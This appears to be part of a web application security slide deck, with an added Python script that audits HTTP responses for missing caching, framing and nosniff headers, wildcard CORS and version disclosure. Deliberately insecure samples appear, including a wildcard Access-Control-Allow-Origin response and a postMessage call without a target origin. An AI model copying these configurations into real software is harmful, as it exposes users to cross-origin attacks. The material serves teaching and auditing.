       Resource Type   Tag/Method          Sink
       Frame           iframe              src
       Link            a                   href
       AJAX Request    , [url], true);     URL
       CSS             link                href
       Image           img                 src
       Object          object              data
       Script          script              src
  135. HTTP/1.1 200 OK
       Date: Mon, 07 Oct 2013 18:57:53 GMT
       Server: Apache/2.2.22 (Debian)
       X-Powered-By: PHP/5.4.4-14+deb7u3
       Access-Control-Allow-Origin: *
       Content-Length: 4
       Keep-Alive: timeout=15, max=99
       Connection: Keep-Alive
       Content-Type: application/xml
       [Response Body]
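An added example (not from the original slides) that audits the three response-header situations the deck shows: the anti-caching directives on slide 62 for pages carrying sensitive data, the protective headers on slide 127, and the wildcard Access-Control-Allow-Origin on slide 135, together with the X-Powered-By disclosure from slide 27. The two raw responses are constructed from the slides' contents; the expectations are a common baseline, not a standard's wording.

```python
"""Audit raw HTTP responses for caching, framing, sniffing, CORS and version disclosure."""
from typing import Dict, List


def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw response head into a lower-cased header dict (status line dropped)."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:
        if not line.strip():
            break  # end of headers
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def audit_response(raw: str, sensitive: bool = False) -> List[str]:
    """Return finding strings; `sensitive` marks a page that must not be cached."""
    h = parse_headers(raw)
    findings = []
    cc = {d.strip().lower() for d in h.get("cache-control", "").split(",") if d.strip()}
    if sensitive and not ({"no-store", "no-cache"} & cc):
        findings.append("sensitive page without Cache-Control: no-store/no-cache")
    if sensitive and h.get("pragma", "").lower() != "no-cache":
        findings.append("sensitive page without Pragma: no-cache for HTTP/1.0 caches")
    if h.get("x-frame-options", "").upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options missing or permissive (clickjacking)")
    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing")
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao == "*":
        findings.append("CORS allows any origin (*)")
        if creds:
            findings.append("wildcard origin combined with credentials")
    elif acao and creds:
        findings.append(f"credentialed CORS for {acao}: confirm it is an allow-list, not reflection")
    if "x-powered-by" in h:
        findings.append(f"version disclosure: X-Powered-By: {h['x-powered-by']}")
    return findings


# Constructed from slide 127 (hardened headers, but a cacheable page)
SLIDE127 = """HTTP/1.1 200 OK
Date: Tue, 15 Oct 2013 14:11:09 GMT
Server: Apache
X-Frame-Options: Deny
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Language: en
Vary: Accept-Encoding,Cookie
Expires: Wed, 16 Oct 2013 14:11:09 GMT
Cache-Control: max-age=86400
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
"""

# Constructed from slide 135 (wildcard CORS, version disclosure, no protective headers)
SLIDE135 = """HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:57:53 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: *
Content-Length: 4
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: application/xml
"""
```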
  140. iframe1.contentWindow.postMessage("Hello world", "");
  141. The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. OWASP's mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks.
  142. Net-Square Solutions Private Limited is a niche information security service provider. Net-Square is completely and mainly focused on technology-based areas of information security such as application and infrastructure security. Net-Square Solutions was founded by the internationally experienced information security specialist Saumil Shah in the year 2000. Since then Net-Square has conducted many assignments for some of the best organizations in the world, in sectors ranging from banking and financial services to telecom, retail and pharmaceuticals.